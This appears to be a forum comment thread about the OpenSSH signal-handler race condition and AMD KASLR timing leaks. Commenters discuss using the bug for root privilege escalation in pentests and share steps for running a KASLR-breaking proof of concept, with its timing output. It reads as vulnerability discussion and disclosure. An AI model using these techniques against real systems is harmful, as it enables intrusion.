> In our experiments, it takes ~10,000 tries on average to win this race
condition, so ~3-4 hours with 100 connections (MaxStartups) accepted
per 120 seconds (LoginGraceTime). Ultimately, it takes ~6-8 hours on
average to obtain a remote root shell, because we can only guess the
glibc's address correctly half of the time (because of ASLR).
In theory, this could be used (much quicker than the mentioned days/weeks) to get local privilege escalation to root, if you already have some type of shell on the system already. I would assume that fail2ban doesn't block localhost.
>People are generally not trying to get root via an SSH RCE over localhost. That's going to be a pretty small sample of people that applies to
It's going to apply to the amount of servers that an attacker has low-privileged access (think: www-data) and an unpatched sshd. Attackers don't care if it's an RCE or not: if a public sshd exploit can be used on a system with a Linux version without a public Linux LPE, it will be used. Being local also greatly increases the exploitability.
Then consider the networks where port 22 is blocked from the internet but sshd is running in some internal network (or just locally for some reason).
Think “illegitimate” access to www-data. It’s very common on linux pentests to need to privesc from some lower-privileged foothold (like a command injection in an httpd cgi script). Most linux servers run openssh. So yes I would expect this turns out to be a useful privesc in practice.
I don’t get it then… Do you never end up having to privesc in your pentests on linux systems? No doubt it depends on customer profile but I would guess personally on at least 25% of engagements in Linux environments I have had to find a local path to root.
> Do you never end up having to privesc in your pentests on linux systems?
Of course I do.
I'm not saying privsec isn't useful, I'm saying the cases where you will ssh to localhost to get root are very rare.
Maybe you test different environment or something, but on most corporate networks I test the linux machines are dev machines just used for compiling/testing and basically have shared passwords, or they're servers for webapps or something else where normal users most who have a windows machine won't have a shell account.
If there's a server where I only have a local account and I'm trying to get root and it's running an ssh server vulnerable to this attack, of course I'd try it. I just don't expect to be in that situation any time soon, if ever.
>I test the linux machines are dev machines just used for compiling/testing and basically have shared passwords, or they're servers for webapps or something else where normal users most who have a windows machine won't have a shell account.
And you don't actually pentest the software which those users on the windows machine are using on the Linux systems? So you find a Jenkins server which can be used to execute Groovy scripts to execute arbitrary commands, the firewall doesn't allow connections through port 22, and it's just a "well, I got access, nothing more to see!"?
> And you don't actually pentest the software which those users on the windows machine are using on the Linux systems?
You really love your assumptions, huh?
> it's just a "well, I got access, nothing more to see!"?
I said nothing like that, and besides that, if you were not just focused on arguing for the sake of it, you would see MY point was about the infrequency of the situation you were talking about (and even then your original point seemed to be contrarian in nature more than anything).
Instead of taking the time to reply 'huh' multiple times, you should make sure you read what you're replying to.
For example:
> Huh? Exploiting an unpatched vulnerability on a server to get access to a user account is.. very rare?
The 'this' I refer to is very clearly not what you've decided to map it to here. The 'this' I refer to, if you follow the comment chain, refers to a subset of something you said which was relevant to your point - the rest was not.
You could have also said "99% of people don't let their login timeout and hit the SIGALRM"... People don't usually use an SSH RCE because there usually isn't an SSH RCE. If there is, why wouldn't they?
It doesn't matter if 99% of the situations you can think of are not problematic. If 1% is feasible and the attackers know about it, it's an attack vector.
>Side note: we discovered that Ubuntu 24.04 does not re-randomize the
ASLR of its sshd children (it is randomized only once, at boot time); we
tracked this down to the patch below, which turns off sshd's rexec_flag.
This is generally a bad idea, but in the particular case of this signal
handler race condition, it prevents sshd from being exploitable: the
syslog() inside the SIGALRM handler does not call any of the malloc
functions, because it is never the very first call to syslog().
> Ultimately, it takes ~6-8 hours on average to obtain a remote root shell, because we can only guess the glibc's address correctly half of the time (because of ASLR).
AMD to the rescue - fortunately they decided to leave the take-a-way and prefetch-type-3 vulnerability unpatched, and continue to recommend that the KPTI mitigations be disabled by default due to performance costs. This breaks ASLR on all these systems, so these systems can be exploited in a much shorter time ;)
AMD’s handling of these issues is WONTFIX, despite (contrary to their assertion) the latter even providing actual kernel data leakage at a higher rate than meltdown itself…
edit: there is a third now building on the first one with an unpatched vulnerabilities in all zen1/zen2 as well… so this one is WONTFIX too it seems, like most of the defects TU Graz has turned up.
Seriously I don’t know why the community just tolerates these defenses being known-broken on the most popular brand of CPUs within the enthusiast market, while allowing them to knowingly disable the defense that’s already implemented that would prevent this leakage. Is defense-in-depth not a thing anymore?
Nobody in the world would ever tell you to explicitly turn off ASLR on an intel system that is exposed to untrusted attackers… yet that’s exactly the spec AMD continues to recommend and everyone goes along without a peep. It’s literally a kernel option that is already running and tested and hardens you against ASLR leakage.
The “it’s only metadata” is so tired. Metadata is more important than regular data, in many cases. We kill people, convict people, control all our security and access control via metadata. Like yeah it’s just your ASLR layouts leaking, what’s the worst that could happen? And I mean real data goes too in several of these exploits too, but that’s not a big deal either… not like those ssh keys are important, right?
What are you talking about ?
My early-2022 ryzen 5625U shows:
Vulnerabilities:
Gather data sampling: Not affected
Itlb multihit: Not affected
L1tf: Not affected
Mds: Not affected
Meltdown: Not affected
Mmio stale data: Not affected
Reg file data sampling: Not affected
Retbleed: Not affected
Spec rstack overflow: Vulnerable: Safe RET, no microcode
Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl
Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization
Spectre v2: Mitigation; Retpolines; IBPB conditional; IBRS_FW; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected
Srbds: Not affected
Tsx async abort: Not affected
> KPTI won't be default enabled on Linux on AMD CPUs is the issue here. Yet it provides valuable separation between kernel and userspace address ranges.
AMD's security bulletin is actually incredibly weaselly and in fact quietly acknowledges KPTI as the reason further mitigation is not necessary, and then goes on to recommend that KPTI remain disabled anyway.
> The attacks discussed in the paper do not directly leak data across address space boundaries. As a result, AMD is not recommending any mitigations at this time.
That's literally the entire bulletin, other than naming the author and recommending you follow security best-practices. Two sentences, one of which is "no mitigations required at this time", for an exploit which is described by the author (who is also a named author of the Meltdown paper!) as "worse than Meltdown", in the most popular brand of server processor.
Like it's all very carefully worded to avoid acknowledging the CVE in any way, but to also avoid saying anything that's technically false. If you do not enable KPTI then there is no address space boundary, and leakage from the kernel can occur. And specifically that leakage is page-table layouts - which AMD considers "only metadata" and therefore not important (not real data!).
But it is a building block which amplifies all these other attacks, including Specter itself. Specter was tested in the paper itself and - contrary to AMD's statement (one of the actual falsehoods they make despite their weaseling) - does result in actual leakage of kernel data and not just metadata (the author notes that this is a more severe leak than meltdown itself). And leaking metadata is bad enough by itself - like many kinds of metadata, the page-table layouts are probably more interesting (per byte exfiltrated) than the actual data itself!
AMD's interest is in shoving it under the rug as quietly as possible - the solution is flushing the caches every time you enter/leave kernel space, just like with Meltdown. That's what KPTI is/does, you flush caches to isolate the pages. And AMD has leaned much more heavily on large last-level caches than Intel has, so this hurts correspondingly more.
But I don't know why the kernel team is playing along with this. The sibling commenter is right in the sense that this is not something that is being surfaced to users to let them know they are vulnerable, and that the kernel team continues to follow the AMD recommendation of insecure-by-default and letting the issue go quietly under the rug at the expense of their customers' security. This undercuts something that the kernel team has put significant engineering effort into mitigating - not as important as AMD cheating on benchmarks with an insecure configuration I guess.
There has always been a weird sickly affection for AMD in the enthusiast community, and you can see it every time there's an AMD vulnerability. When the AMD vulns really started to flow a couple years ago, there was basically a collective shrug and we just decided to ignore them instead of mitigating. So much for "these vulnerabilities only exist because [the vendor] decided to cut corners in the name of performance!". Like that's explicitly the decision AMD has made with their customers' security. And everyone's fine with it, same weird sickly affection for AMD as ever among the enthusiast community. This is a billion-dollar company cutting corners on their customers' security so they can win benchmarks. It's bad. It shouldn't need to be said, but it does.
I very much feel that - even given that people's interest or concern about these exploits is fading over time - that even today (let alone a couple years ago) Intel certainly would not have received the same level of deference if they just said that a huge, performance-sapping patch was "not really necessary" and that everyone should just run their systems in an insecure configuration so that benchmarks weren't unduly harmed. It's a weird thing people have where they need to cover all the bases before they will acknowledge the slightest fault or problem or misbehavior with this specific corporation. Same as the sibling who disputed all this because Linux said he was secure - yeah, the kernel team doesn't seem to care about that, but as I demonstrated there is still a visible timing thing even on current BIOS/OS combinations.
Same damn thing with Ryzenfall too - despite the skulduggery around Monarch, CTS Labs actually did find a very serious vuln (actually 3-4 very serious exploits that let them break out of guest/jailbreak PSP and bypass AMD's UEFI signing and achieve persistence, and it's funny to look back at the people whining that it doesn't deserve a 9.0 severity or whatever. Shockingly, MITRE doesn't give those out for no reason, and AMD doesn't patch "root access lets you do root things" for no reason either.
I get why AMD is doing it. I don't get why the kernel team plays along. It's unintentionally a really good question from the sibling: why isn't the kernel team applying the standards uniformly? Here's A Modest Security Proposal: if we just don't care about this class of exploit anymore, and KASLR isn't going to be a meaningful part of a defense-in-depth, shouldn't it be disabled for everyone at this point? Is that a good idea?
But is this not the same thing on intel CPU ? I believe "new" intel CPU are, too, unaffected by meltdown, and so kpti will be disabled there by default.
if there are no errata leading to (FG)KASLR violations, then no problem disabling KPTI as a general security boundary. The thing I am saying is that vendors do not agree on processors providing ASLR timing attack protection as a defined security boundary in all situations.
you need to either implement processor-level ASLR protections (and probably these guarantees fade over time!) or kpti/flush your shit when you move between address spaces. Or there needs to be an understanding from the kernel team that they need to develop under the page allocation model that attackers can see your allocation patterns after initial breaches. like let's say they breach your PRNG key. Should there be additional compartmentalization after that? Multiple keys at multiple security boundaries / within the stack more generally to increase penetration time across security boundaries?
seemingly the expectation is one or the other though, because ASLR security is being treated as a security boundary.
I also very much feel that at this point KPTI is just a generalized good defense in depth. If that's the defense that's going to be deployed after your shit falls through... let's just flush it preemptively, right? That's not the current practice but should it be?
you probably want to do `export WITH_TLB_EVICT=1` before you make, then run ./kaslr. The power stuff is patched (by removing the RAPL power interface) but there is still timing differences visible on my 5700G and the WITH_TLB_EVICT makes this fairly obvious/consistent:
those timing differences are the presence/nonpresence of kernel pages in the TLB, those are the KASLR pages, they’re slower when the TLB eviction happens because of the extra bookkeeping.
then we have the stack protector canary on the last couple pages of course:
```csv
512,0xffffffffbf800000,91,82,155
513,0xffffffffbfa00000,92,82,147
514,0xffffffffbfc00000,92,82,151
515,0xffffffffbfe00000,91,82,137
516,0xffffffffc0000000,112,94,598
517,0xffffffffc0200000,110,94,544
518,0xffffffffc0400000,110,94,260
519,0xffffffffc0600000,110,94,638
```
edit: the 4 pages at the end of the memory space are very consistent between tests and across reboots, and the higher lookup time goes away if you set the kernel boot option "pti=on" manually at startup, that’s the insecure behavior as described in the paper.
Mitigate by using fail2ban?
Nice to see that Ubuntu isn't affected at all